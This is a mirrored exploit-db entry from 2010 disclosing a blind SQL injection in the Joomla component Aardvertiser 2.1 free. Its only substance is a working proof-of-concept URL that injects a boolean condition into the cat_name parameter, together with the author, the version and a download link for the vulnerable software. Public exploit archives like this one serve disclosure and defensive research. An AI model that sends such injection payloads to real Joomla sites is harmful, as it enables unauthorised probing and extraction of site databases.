Joomla! Component Aardvertiser 2.1 – Blind SQL Injection

  • 作者: Stephan Sattler
    日期: 2010-09-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14922/
  • # Exploit Title: Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability
    # Date: 07.09.2010
    # Author: Stephan Sattler // www.solidmedia.de
    # Software Link: http://sourceforge.net/projects/aardvertiser/files/com_aardvertiser%20V2.1.1%20Free/com_aardvertiserfree.zip/download
    # Version: 2.1 free
    
    
    [ Vulnerability//PoC ]
    
    http://server/joomlapath/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view